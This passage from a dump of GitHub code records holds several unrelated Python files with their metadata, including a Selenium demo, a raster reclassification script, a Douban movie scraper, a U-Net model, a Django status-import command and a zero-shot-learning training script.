10\t\n\n\treturn args\n\n","repo_name":"rafaelmp2/causal-marl","sub_path":"MARL_framework/acd_with_marl/common/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30084070467","text":"# -*- coding: utf-8 -*-\n# @Author : 王翔\n# @JianShu : 清风Python\n# @Date : 2019/6/19 0:02\n# @Software : PyCharm\n# @version :Python 3.6.8\n# @File : Day2.2_chrome_option_window.py\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\noptions.add_argument('--start-maximized')\n# options.add_argument('--window-size=900,600')\n\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.get(\"https://www.jianshu.com/u/d23fd5012bed\")\n\ndriver.quit()\n\n","repo_name":"BreezePython/SeleniumTest","sub_path":"Day2_selenium浏览器窗口与Option操作/Day2.2_chrome_option_window.py","file_name":"Day2.2_chrome_option_window.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"4348318611","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 17 13:48:48 2019\nThis script reclassifies lossyear > 12 to 
1, 0 otherwise.\n@author: pj276\n\"\"\"\n\n# Import packages\nimport sys, os, gdal\nimport numpy as np\nsys.path.append('/home/pj276/projects/ifl_corridors/code/functions/')\n# For hf_utilities, the modules are available within the functions\n# when they're used. Otherwise, one needs to prefix with hfu.\n# e.g. hfu.shp.Writer\nimport hf_utilities as hfu\nsys.path.append('/home/pj276/projects/ifl_corridors/code/parameter_files/')\nsys.path.append('/home/pj276/projects/undp_connectivity/code/parameter_files/')\nimport param_file as p1\n\n# Job array index\nj = int(sys.argv[1]) - 1 # subtract for python zero indexing\n\n# Loss year value\nlyv = p1.lyv #12\n\n# Threshold type\ngtorlt = p1.gtorlt\n\n# Reclass loss year name\nrclyname = p1.rclyname\n\n# List loss year files\nfl = os.listdir(p1.tld + p1.fcd)\nfl = [i for i in fl if 'lossyear' in i and i.endswith('.tif')]\n\n# Get file name to work on\nfnamely = p1.tld + p1.fcd + '/' + fl[j]\n\n# Loss year\nlyear = hfu.raster2array(fnamely)\nlya = lyear[0]\ndel lyear\n\nif gtorlt == 'gt':\n # Reclass loss year > 12 to 1, else 0\n lya = np.where(lya > lyv, 1, 0)\n lya = lya.astype('int8')\nelse:\n # Reclass loss year <= 12 to 1, else 0\n lya = np.where((lya > 0) & (lya <= lyv), 1, 0)\n lya = lya.astype('int8')\n\n# Output reclassed loss file name\nofn = os.path.dirname(fnamely) + os.sep + os.path.basename(fnamely).replace('lossyear', rclyname)\n# Write to array\nhfu.array2raster(ofn, fnamely, gdal.GDT_Byte, 'GTiff', lya)\n","repo_name":"forest-rev/ifl_connectivity","sub_path":"scripts/hf2_reclass_lossyear.py","file_name":"hf2_reclass_lossyear.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10948959974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 25 23:37:07 2017\n\n@author: zil20\n\"\"\"\n\ndef computegrade(score):\n if 0.0 <= score < 0.6:\n return \"F\"\n elif score < 0.7:\n return \"D\"\n elif score < 0.8:\n return \"C\"\n elif score < 0.9:\n return \"B\"\n elif score <= 1.0: \n return \"A\"\n else:\n return \"Bad score\"\ntry: \n score = float(input(\"Enter score: \"))\n print(computegrade(score))\n \nexcept:\n print(\"Bad score\") ","repo_name":"franciszxlin/pythonlearn","sub_path":"Exercises/ch3e3.py","file_name":"ch3e3.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38964032307","text":"\n# coding: utf-8\n\n# \n# # StudyQuant\n# 作者 : Rudy\n\n# # 基本数据类型\n\n# Python 是一种动态类型语言,这意味着. 
Python 解择程序在运行时推知对象的类也C\n# 等编译语言通常是静态类型语言,在这类语言,对象类型必须在编译之前与对象\n# 绑定\n\n# # Python有五个标准的数据类型:\n# - Numbers(数字)\n# - String(字符串)\n# - List(列表)\n# - Tuple(元组)\n# - Dictionary(字典)\n# \n\n# 四种不同的数类型:\n# - int(整型) 0,1 等\n# - long(长整型[也可以代表八进制和十六进制])\n# - float(浮点型) 3.6 等\n# - complex(复数) 如 4+2j\n# - Bool : True, False\n# - String : “hello, world”\n# \n\n# # 一切都是对象\n\n# ## Basic Data Types\n\n# # int 整数\n\n# In[28]:\n\n\na = 10\ntype(a)\n\n\n# In[29]:\n\n\na.bit_length() #获得表现int 对象所需的位数\n\n\n# In[30]:\n\n\na = 100000\n\n\n# In[31]:\n\n\nprint(a)\n\n\n# In[8]:\n\n\ngoogol = 10 ** 100\ngoogol\n\n\n# In[32]:\n\n\n1 + 4\n\n\n# In[33]:\n\n\n1 / 4\n\n\n# In[34]:\n\n\ntype(1 / 4)\n\n\n# In[35]:\n\n\n5*6\n\n\n# In[36]:\n\n\n10/2\n\n\n# ## 数字的基本操作\n# python中的数字都支持下面的操作:\n# \n# 1、x + y:x加y;\n# 2、x - y:x减y;\n# 3、x * y:x和y的积;\n# 4、x / y:x和y的商;\n# 5、x // y:x和y的商的下限,即取整;\n# 6、x % y:x/y的余;\n# 7、abs(x):x为整型和浮点型,返回x的绝对值;x为复数型,返回x的magnitude(注);\n# 8、int(x):将x转换到整型;\n# 9、float(x):将x转换到浮点型;\n# 10、complex(re, im):得到实部为re,虚部为im的复数;\n# 11、c.conjugate():返回复数c的共轭复数;\n# 12、divmod(x, y):返回对(x // y, x % y);\n# 13、pow(x, y):x的y次方;\n# 14、x ** y:同pow(x, y),x的y次方。\n# \n\n# ### Floats\n\n# In[43]:\n\n\n1 / 4\n\n\n# In[44]:\n\n\ntype (1. / 4)\n\n\n# In[45]:\n\n\nb = 0.35\ntype(b)\n\n\n# ### Strings\n\n# 而'Hello, World!' 是一个字符串,之所以这\n# 么称呼是因为它包含一“串”字母。因为被引号包围,读者(以及解释器)可以将它们识\n# 别为字符串。\n\n# In[46]:\n\n\nt = 'studyQuant offers Python Courses'\n\n\n# In[47]:\n\n\nt\n\n\n# In[48]:\n\n\nt.capitalize()\n\n\n# In[49]:\n\n\nt.split()\n\n\n# In[50]:\n\n\nt.upper()\n\n\n# In[51]:\n\n\nt.find('studyquant')\n\n\n# In[52]:\n\n\nt.find('Python')\n\n\n# In[53]:\n\n\nt[18]\n\n\n# In[54]:\n\n\nt.replace(' ', '|')\n\n\n# In[58]:\n\n\n'http://www.python.org'.strip('htp:/')\n\n\n# \n## 更多量化学习资源\n#\n# \"StudyQuant\"
    \n#\n# 扫上方二维码,关注公众账号 量化投资学院 ,获取下列免费资源\n# - 回复**“热点研报”**,获取近年热点券商金融工程研究报告\n# - 回复**“Python3”**,获取Python免费学习教程\n# - 回复**“quant教材与面试经验”**, 获取 quant教材与面试经验 资料\n# * [更多福利请点击此链接](https://www.jianshu.com/p/2ffb29f1a1aa)\n#\n#\n# ## 关注StudyQuant\n# * [课程](https://appcop3i2898823.h5.xiaoeknow.com/homepage)\n# - [量化投资与数据分析实战](http://study.163.com/course/introduction/1004855008.htm?share=2&shareId=400000000342001)\n# - [量化投资与数字货币实战](https://appcop3i2898823.h5.xiaoeknow.com/homepage)\n# * [知乎](https://zhuanlan.zhihu.com/studyquant)\n# * [简书](https://www.jianshu.com/u/495eda774816)\n# * [公众号](https://mp.weixin.qq.com/s__biz=MzU5NzU5NjIwMQ==&mid=100000028&idx=1&sn=2f8c053849f296455ec85406e80b2a2d&chksm=7e50405a4927c94c18ba438e0c309a7d13883621ddf02904266026556e9994ad1c3f8558327d&mpshare=1&scene=1&srcid=0810AEevB9zID4Ywzl1icPfA#rd)\n#\n# #","repo_name":"studyquant/studyquant","sub_path":"Tutorial/1.0 数据类型介绍/1.3 数据基本类型-整数、浮点、字符串.py","file_name":"1.3 数据基本类型-整数、浮点、字符串.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"zh","doc_type":"code","stars":41,"dataset":"github-code","pt":"40"} +{"seq_id":"23233361383","text":"from string import ascii_lowercase, ascii_uppercase\nfrom collections import deque, defaultdict\nfrom typing import List\n\n\nclass Solution:\n def shortestPathAllKeys(self, grid: List[str]) -> int:\n def neighbors(r: int, c: int):\n answers = [(r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)]\n answers = [(nr, nc) for (nr, nc) in answers if 0 <= nr < M and 0 <= nc < N]\n\n return answers\n\n M, N = len(grid), len(grid[0])\n keys_done = 0\n for i in range(M):\n for j in range(N):\n cell = grid[i][j]\n if cell == \"@\":\n start_r, start_c = i, j\n elif cell in ascii_lowercase:\n keys_done |= 1 << (ord(cell) - ord(\"a\"))\n\n q = deque([(start_r, start_c, 0, 0)])\n visited = defaultdict(set)\n visited[0].add((start_r, start_c))\n\n while q:\n r, c, keys, dist = q.popleft()\n for nr, nc in neighbors(r, c):\n cell = grid[nr][nc]\n wall = cell == \"#\"\n locked = (cell in ascii_uppercase) and not (\n keys & (1 << (ord(cell) - ord(\"A\")))\n )\n if (nr, nc) in visited[keys] or wall or locked:\n continue\n if cell in ascii_lowercase:\n keys_new = keys | (1 << (ord(cell) - ord(\"a\")))\n if keys_new == keys_done:\n return dist + 1\n\n q.append((nr, nc, keys_new, dist + 1))\n visited[keys_new].add((nr, nc))\n else:\n q.append((nr, nc, keys, dist + 1))\n visited[keys].add((nr, nc))\n\n return -1\n","repo_name":"LeetCube/LeetCube","sub_path":"python/src/code_864.py","file_name":"code_864.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"26201701064","text":"import re\nimport requests\nimport xlwt\n\nurl = \"https://movie.douban.com/top250?qq-pf-to=pcqq.group\"\nhead = {\n\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.51\"\n}\n# 发送请求\nr = requests.get(url,headers=head)\n# 解码\na = r.content.decode(\"utf-8\")\n# print(a)\nb = re.findall(\"
<li>(.*?)</li>\",a,re.S)\n# print(b)\n\nlist2 = []\n\nfor i in b:\n    list1 = []\n    c = re.findall('alt=\"(.*?)\" src=',i,re.S)\n    # print(c)\n    list1.extend(c)\n    d = re.findall('src=\"(.*?)class=\"\">',i,re.S)\n    # print(d)\n    list1.extend(d)\n    list2.append(list1)\nprint(list2)\n# print(list1)\n\n\nf = xlwt.Workbook(encoding='utf8')\nsheet = f.add_sheet('电影介绍链接')\n# 创建一个列表,用来循环插入表头\nlist4 = [\"电影名\", \"超链接\"]\nfor c, d in enumerate(list4):\n    sheet.write(0, c, d)\n\n# for m,n in enumerate(list2, 1):\n\nfor i in list2:\n    # print(i)\n    # i.insert()\n    print(i)\n\n\n\n\n# f.save('movie.xls')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# f = xlrd.open_workbook(\"python.xls\")\n# # 复制文件并起名为new_f\n# new_f = copy(f)\n# # 创建一个工作表对象,用于操作整个工作表\n# sheet = new_f.get_sheet(0)\n# sheet.write(100, 0, \"博文你好\")\n# new_f.save(\"python.xls\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"goodeveryone/awsl","sub_path":"pythonproject/bowen2005/爬虫练习/爬取电影海报图片.py","file_name":"爬取电影海报图片.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2744874233","text":"\"\"\"\nAuthor: Kourosh T. Baghaei\nA customized Implementation of U-Net for Image Segmentation Task\nMarch 29, 2020\n\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.python.keras import layers\nfrom tensorflow.python.keras.layers import Input,Activation\nfrom tensorflow.python.keras.models import Model,Sequential\nfrom tensorflow import keras\n\n#\n# Network Structure:\n# Contractive Path: Layer 1 -> Layer 2 -> Layer 3\n# Bottleneck: Layer 4\n# Expanding Path: Layer 5 -> Layer 6 -> Layer 7\n#\n\n\nclass MyUNet(tf.keras.Model):\n    def __init__(self, input_shape=(128, 128, 3)):\n        super(MyUNet, self).__init__()\n\n        inputs = Input(shape=input_shape)\n\n        # Layer 1\n        self.layer1 = self.build_layer1(inputs)  # layer1's output: (None, 170, 170, 64). First dimension, denoted\n        # with 'None' represents the batch size.\n\n        # Layer 2\n        i2 = Input(self.layer1.output.shape[1:])\n        self.layer2 = self.build_layer2(i2)  # layer2's output: (None, 83, 83, 128)\n\n        # Layer 3\n        i3 = Input(self.layer2.output.shape[1:])\n        self.layer3 = self.build_layer3(i3)  # layer3's output: (None, 39, 39, 256)\n\n        # Layer 4\n        i4 = Input(self.layer3.output.shape[1:])\n        self.layer4 = self.build_layer4(i4)  # layer4's output: (None, 34, 34, 256)\n\n        # Layer 5\n        s = self.layer4.output.shape\n        self.crop_size = s[1:]  # output of layer3 should be cropped in heights and widths to match those of layer4.\n        s = s[1:-1] + [s[-1] * 2]  # output of layer4 and layer3 are merged before being fed to layer5.\n        # This is why the last dimension of the tensor is doubled.\n        # layer5 input: (None, 34, 34, 512)\n        self.layer5 = self.build_layer5(Input(s))  # layer5's output: (None, 64, 64, 128)\n\n        # Layer 6\n        s = self.layer5.output.shape\n        s = s[1:-1] + [s[-1] * 2]  # output of layer 5 and layer 2 are merged together. So, the input of layer 6\n        # looks like: (None, 64, 64, 128)\n        self.layer6 = self.build_layer6(Input(s))  # layer6's output: (None, 124, 124, 64)\n\n        # Layer 7\n        s = self.layer6.output.shape\n        s = s[1:-1] + [s[-1] * 2]  # output of layer 6 and layer 1 are merged together.
So, the input of layer 7\n # looks like: (None, 124, 124, 128)\n self.layer7 = self.build_layer7(Input(s)) # layer7's output: (None, 122, 122, 2)\n\n def call(self, inputs):\n o1 = self.layer1(inputs)\n o2 = self.layer2(o1)\n o3 = self.layer3(o2)\n o4 = self.layer4(o3)\n\n # randomly crop o3 tensor in batches\n self.crop_size = o4.shape[1:]\n cropped = tf.map_fn(self.crop_rand, o3)\n # Skip Connection ( concat of layer3 and layer4 )\n i5 = layers.concatenate([cropped, o4])\n o5 = self.layer5(i5)\n\n # randomly crop o2 tensor in batches\n self.crop_size = o5.shape[1:]\n cropped = tf.map_fn(self.crop_rand, o2)\n # Skip Connection ( concat of layer2 and layer5 )\n i6 = layers.concatenate([cropped, o5])\n o6 = self.layer6(i6)\n\n # randomly crop o1 tensor in batches\n self.crop_size = o6.shape[1:]\n cropped = tf.map_fn(self.crop_rand, o1)\n # Skip Connection ( concat of layer1 and layer6 )\n i7 = layers.concatenate([cropped, o6])\n o7 = self.layer7(i7)\n\n return o7\n\n # randomly crop an image\n def crop_rand(self, img):\n return tf.image.random_crop(img, self.crop_size)\n\n def build_layer1(self, inp):\n layer1 = Sequential([\n layers.Conv2D(64, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(64, 2),\n layers.LeakyReLU(),\n ])(inp)\n print('layer 1', layer1.shape)\n return keras.Model(inp, layer1)\n\n def build_layer2(self, inp):\n layer2 = Sequential([\n layers.MaxPooling2D(),\n layers.BatchNormalization(),\n layers.Dropout(0.3),\n layers.Conv2D(128, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(128, 2),\n layers.LeakyReLU(),\n ])(inp)\n print('layer 2', layer2.shape)\n return keras.Model(inp, layer2)\n\n def build_layer3(self, inp):\n layer3 = Sequential([\n layers.MaxPooling2D(),\n layers.BatchNormalization(),\n layers.Dropout(0.3),\n layers.Conv2D(256, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(256, 2),\n layers.LeakyReLU(),\n ])(inp)\n print('layer 3', layer3.shape)\n return keras.Model(inp, layer3)\n\n def build_layer4(self, inp):\n layer4 = Sequential([\n layers.MaxPooling2D(),\n layers.BatchNormalization(),\n layers.Dropout(0.3),\n layers.Conv2D(512, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(512, 2),\n layers.LeakyReLU(),\n layers.Dropout(0.3),\n layers.Conv2DTranspose(256, 2, 2),\n ])(inp)\n print('layer 4', layer4.shape)\n return keras.Model(inp, layer4)\n\n def build_layer5(self, inp):\n layer5 = Sequential([\n layers.Conv2D(512, 2),\n Activation('relu'),\n layers.Conv2D(256, 2),\n Activation('relu'),\n layers.Conv2DTranspose(128, 2, 2)\n ])(inp)\n print('layer 5 ', layer5.shape)\n return keras.Model(inp, layer5)\n\n def build_layer6(self, inp):\n layer6 = Sequential([\n layers.Conv2D(256, 2),\n Activation('relu'),\n layers.Conv2D(128, 2),\n Activation('relu'),\n layers.Conv2DTranspose(64, 2, 2)\n ])(inp)\n print('layer 6 ', layer6.shape)\n return keras.Model(inp, layer6)\n\n def build_layer7(self, inp):\n layer7 = Sequential([\n layers.Conv2D(256, 2),\n Activation('relu'),\n layers.Conv2D(128, 2),\n Activation('relu'),\n layers.Conv2D(2, 1),\n layers.Softmax()\n ])(inp)\n print('layer 7 ', layer7.shape)\n return keras.Model(inp, layer7)\n\n","repo_name":"kbaghaei/U-Net-TF","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16911326146","text":"from colorama import Fore\nfrom colorama import Style\nimport pandas as pd\nimport 
numpy as np\nimport time\nglobal filepath\nfile_path = 'C:/Users/rjw3/OneDrive/Desktop/Side_projects' + \\\n '/Perfect_numbers/time_to_check_numbers.xlsx'\n\n\n#check for correct input of (y/n)\ndef check(k):\n switch = {\n 'y': 1,\n 'n': 2,\n }\n return switch.get(k, 3)\n\n#check for correct input of max range\ndef maxrngf():\n while True:\n try:\n maxrng1=int(input('max range: '))\n except ValueError:\n print(Fore.RED + \"Must be a whole number.\")\n print(Style.RESET_ALL)\n else:\n return maxrng1\n\n#push times to excel\ndef push(list_):\n list_ = np.array(list_)\n list_ = pd.DataFrame(list_)\n global file_path\n list_.to_excel(file_path)\n\n#ask user if the default file path is ok\n\nwhile True:\n yn = input('Is the default filepath \\n\"' + str(file_path) + '\"\\nwhere the excel data should be sent? (y/n) : ')\n yn = check(yn)\n if yn == 1:\n break\n if yn == 2:\n file_path = input('Excel filepath for time data to be sent: ')\n break\n if yn == 3:\n print(Fore.RED + 'Error: Wrong input type')\n print(Style.RESET_ALL)\n\n\n\n\n\n# look for perfect numbers\nwhile True:\n maxrng = maxrngf()\n perfectnumb=[]\n searchrng=list(range(1,maxrng))\n times = [None] * (len(searchrng)+1)\n start = time.time()\n for i1 in ((range(0,len(searchrng)))):\n posnumb=int(i1)\n posdiv=[]\n sumposdiv=[]\n for i in range(1,int(((posnumb)/2)+1)):\n if((posnumb)%i==0):\n posdiv.append(i)\n sumposdiv=sum(posdiv)\n if(sumposdiv==posnumb):\n perfectnumb.append(posnumb)\n times[i1] = time.time() - start\n print('\\n')\n print(str(perfectnumb))\n print('\\n')\n del maxrng\n \n# ask if the user would like to push data to \"file_path\"\n while True:\n yn = input('Push to excel (y/n) : ')\n yn = check(yn)\n if yn == 1:\n push(times)\n break\n if yn == 2:\n break\n if yn == 3:\n print(Fore.RED + 'Error: Wrong input type')\n print(Style.RESET_ALL)\n\n# ask if the user would like to try a differnet range \n while True:\n yn = input('Another? (y/n) : ')\n yn = check(yn)\n if yn == 1:\n continuethis = True\n break\n if yn == 2:\n continuethis = False\n break\n if yn == 3:\n print(Fore.RED + 'Error: Wrong input type')\n print(Style.RESET_ALL)\n if continuethis == False:\n break\n \n \n","repo_name":"rjwags72/Perfect-Numbers","sub_path":"pernumbtime_app_source&build/source/perfnumbtime.py","file_name":"perfnumbtime.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19091011709","text":"import sys, csv\nfrom django.core.management.base import BaseCommand\nfrom app.models import Sample\nfrom app.statuses import SampleStatus\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv_file', type=str, help=\"csv file with headers 'well', 'rack', 'barcode', 'call' (or '-' for \"\n \"stdin)\" )\n parser.add_argument('--comment', type=str, default=\"\", help=\"comment to be stored in Event records\", dest='comment')\n\n def handle(self, *args, **options):\n if options['csv_file'] == \"-\":\n fin = sys.stdin\n else:\n fin = open( options['csv_file'], encoding='utf-8-sig' )\n bc_ok = []\n bc_missing = []\n bc_duplicated = []\n wrong_status = []\n status_recorder = {}\n for r in csv.DictReader(fin):\n if r['call'] == '':\n continue\n if r['call'] not in [x.name for x in SampleStatus]:\n print('Unknown status %s set for barcode %s, skipping.' 
% (r['call'], r['barcode']))\n wrong_status.append( r['barcode'] )\n continue\n sq = Sample.objects.filter(barcode=r['barcode'])\n if len(sq) == 0:\n bc_missing.append( r['barcode'] )\n elif len(sq) > 1:\n bc_duplicated.append( r['barcode'] )\n else:\n s = sq.first()\n s.events.create(\n status=r['call'],\n comment=\"Rack %s, Well %s\\n%s\" % (r['rack'], r['well'], options['comment']))\n status_recorder[r['barcode']] = r['call']\n bc_ok.append( r['barcode'] )\n if options['csv_file'] != \"-\":\n fin.close()\n if len(bc_ok) > 0:\n print(\"THE FOLLOWING STATUS HAVE BEEN SET:\")\n for bc, stat in status_recorder.items():\n print(\"Barcode %s ==> %s:\" % (bc, stat))\n else:\n print(\"Status *not* set for any barcode!\")\n if len(bc_missing) > 0:\n print(\"Status *not* set for following barcodes, which are missing in the database:\")\n print(\" \", \", \".join(bc_missing))\n if len(bc_duplicated) > 0:\n print(\"Status *not* set for following barcodes, which each appear multiple times in the database:\")\n print(\" \", \", \".join(bc_duplicated))\n\n\n\n","repo_name":"anders-biostat/covid-test-web-site","sub_path":"covidtest/app/management/commands/set_status_from_csv.py","file_name":"set_status_from_csv.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70534483641","text":"from pandas import DataFrame as pd\nfrom pandas.core.frame import DataFrame\nimport numpy as np\n\n\n\ndata = {\n \"Jogador\":[\"Victor\",\"Bruno\",\"Cimel\",\"GoldB\"],\n \"Skill\":[8,4,10,9],\n \"HS\":[3.2,1.0,5.0,4.0]\n}\n\nframe = DataFrame(data, columns=['Jogador','Skill','HS','Wins'])\n\n#print(type(frame))\n\nframe['Wins'] = np.arange(4.)\n\nprint(frame)\nprint('////////////////////')\n\nprint(frame.describe())","repo_name":"DevVictorr/Analise-de-Dados","sub_path":"Pandas_Numpy - DataFrames/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42428545025","text":"import argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom utils.DataPrepare_zsl import load_data\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom resnet50 import resnet50,resnet101\n\nimport os\n\nimport pandas as pd\n\nfrom RN import RelationNetwork, AttributeNetwork\nimport scipy.io as sio\nimport numpy as np\n\nfrom tqdm import tqdm\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\ndef train_RN( Attri_nn, RN, cnn_fc, device, train_loader, word_embeddings, optimizer_attr, optimizer_rn, scheduler_attr, scheduler_rn, epoch):\n\n Attri_nn.train()\n RN.train()\n\n Attri_nn.to(device)\n RN.to(device)\n scheduler_attr.step(epoch)\n scheduler_rn.step(epoch)\n\n cnn_fc.train()\n cnn_fc.to(device)\n\n word_embeddings = word_embeddings[:365, :]\n Acc = 0\n for batch_idx, sample in enumerate(train_loader):\n\n data = sample[0].to(device)\n label = sample[1].to(device).squeeze(1)\n\n re_label = []\n for slabel in label.cpu().numpy():\n if slabel not in re_label:\n re_label.append(slabel)\n\n word_embeddings = word_embeddings.to(device)\n optimizer_attr.zero_grad()\n optimizer_rn.zero_grad()\n\n\n word_embeddings2 = word_embeddings[re_label] # select the attribute\n class_num = word_embeddings2.shape[0] # use these labels to train in this batch\n batch_size = data.shape[0]\n data = F.relu(cnn_fc(data))\n cnn_feat = data.unsqueeze(0).repeat(class_num, 1, 1)\n\n 
semantic_feat = Attri_nn(word_embeddings2).unsqueeze(0).repeat(batch_size, 1, 1)\n cnn_feat = torch.transpose(cnn_feat, 0, 1)\n score = RN(cnn_feat, semantic_feat)\n score = score.view(-1, class_num)\n\n\n\n re_batch_labels = []\n re_label = np.array(re_label)\n for slabel in label.cpu().numpy():\n index = np.argwhere(re_label == slabel)\n re_batch_labels.append(index[0][0])\n re_batch_labels = torch.LongTensor(re_batch_labels)\n\n\n mse = nn.MSELoss().to(device)\n one_hot_labels = torch.zeros(batch_size, class_num).scatter_(1, re_batch_labels.view(-1, 1), 1).to(device)\n loss = mse(score, one_hot_labels)\n loss.backward()\n optimizer_rn.step()\n optimizer_attr.step()\n _, predict_labels = torch.max(score, 1)\n # _, gt_labels = torch.max(one_hot_labels, 1)\n rewards = [1 if predict_labels[j].cpu() == re_batch_labels[j] else 0 for j in range(batch_size)]\n Acc += np.sum(rewards)\n if batch_idx % args.log_interval == 0:\n log_print = 'Train RN Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item())\n print(log_print)\n with open(args.log, 'a') as f:\n print(log_print, file=f)\n train_acc = Acc/len(train_loader.dataset)\n print(\"Train Acc is %.3f\"%train_acc)\n\n\n with open(args.log, 'a') as f:\n print(\"Train Acc is %.3f\"%train_acc, file=f)\n\n\ndef test_RN(Attri_nn, RN, cnn_fc, device, test_loader, word_embeddings):\n Attri_nn.eval()\n cnn_fc.eval()\n RN.eval()\n Attri_nn.to(device)\n RN.to(device)\n cnn_fc.to(device)\n total_rewards= 0\n word_embeddings = word_embeddings[365:365+40, :]\n with torch.no_grad():\n for batch_idx, sample in enumerate(test_loader):\n\n data = sample[0].to(device)\n\n label = sample[1].to(device).squeeze(1)\n word_embeddings = word_embeddings.to(device)\n\n re_label = []\n for slabel in label.cpu().numpy():\n if slabel not in re_label:\n re_label.append(slabel)\n\n word_embeddings2 = word_embeddings\n class_num = word_embeddings2.shape[0]\n batch_size = data.shape[0]\n data = F.relu(cnn_fc(data))\n cnn_feat = data.unsqueeze(0).repeat(class_num, 1, 1)\n wd_feat = Attri_nn(word_embeddings2).unsqueeze(0).repeat(batch_size, 1, 1)\n cnn_feat = torch.transpose(cnn_feat, 0, 1)\n scores = RN(cnn_feat, wd_feat).view(-1, class_num)\n\n re_batch_labels = []\n re_label = np.array(re_label)\n for slabel in label.cpu().numpy():\n index = np.argwhere(re_label == slabel)\n re_batch_labels.append(index[0][0])\n _, predict_labels = torch.max(scores, 1)\n\n rewards = [1 if predict_labels[j].cpu() == label[j].long().cpu() else 0 for j in range(batch_size)]\n total_rewards += np.sum(rewards)\n num_test = len(test_loader.dataset)\n test_accuracy = total_rewards/len(test_loader.dataset)\n print(\"Test Acc is %.5f\"%test_accuracy)\n with open(args.log, 'a') as f:\n print(\"the Dem accuracy is %.5f\"%test_accuracy, file=f)\n\n\n\n\n\ndef ZSL_result(cnn_fc, Attr_model, RN_model, device, test_loader, word_embeddings, save_path, classes = None, test_code = None):\n cnn_fc.eval()\n Attr_model.eval()\n RN_model.eval()\n cnn_fc.to(device)\n Attr_model.to(device)\n RN_model.to(device)\n imgpath = pd.read_csv('/home/xd133/zero-shot-gcn/round2_DatasetA_20180927/image.txt', header=None)[0]\n word_embeddings = word_embeddings[-45:, :].to(device)\n\n with torch.no_grad():\n pred_decoder = []\n for batch_idx, sample in tqdm(enumerate(test_loader), total=len(test_loader.dataset)):\n\n data = sample[0].to(device)\n\n batch_size = data.shape[0]\n #cnn_feat = data\n cnn_feat = 
F.relu(cnn_fc(data))\n\n wd_feat = Attr_model(word_embeddings).unsqueeze(0).repeat(batch_size, 1, 1)\n\n\n cnn_feat = cnn_feat.unsqueeze(0).repeat(45, 1, 1)\n cnn_feat = torch.transpose(cnn_feat, 0, 1)\n scores = RN_model(cnn_feat, wd_feat).view(-1, 45)\n\n _, predict_labels = torch.max(scores, 1)\n\n pred = predict_labels.cpu().numpy()[0]\n tmp = test_code\n\n pred_decoder.append(tmp[pred])\n preds = pd.Series(pred_decoder)\n result = pd.DataFrame([imgpath, preds]).T\n result.to_csv(save_path, sep = '\\t', header=None, index=None)\n\n\n\n\n\n\nif __name__=='__main__':\n parser = argparse.ArgumentParser(description='Pytorch baseline')\n parser.add_argument('--log_interval', type=int, default=10, help='the interval of the display')\n parser.add_argument('--batch_size', type=int, default=128)\n parser.add_argument('--lr', type=float, default=1e-4)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--wd', type=float, default=1e-5, help='weight_decay')\n parser.add_argument('--epoch', type=int, default=1000, help='the training epoch')\n parser.add_argument('--log', type=str, default='/home/xd133/ZJL_Fusai/log/zsl_log1019_2.txt', help='where to save the log')\n parser.add_argument('--save_path', type=str, default = '/home/xd133/ZJL_Fusai/output/cls_zsl1019.txt', help='path to save the result file')\n parser.add_argument('--test', type = bool, default=False, help='only test?')\n parser.add_argument('--epoch_decay', type=int, default = 30, help = 'decay 0.1 every epoch_decay epoches')\n args = parser.parse_args()\n device = torch.device('cuda')\n\n\n word_embedding = 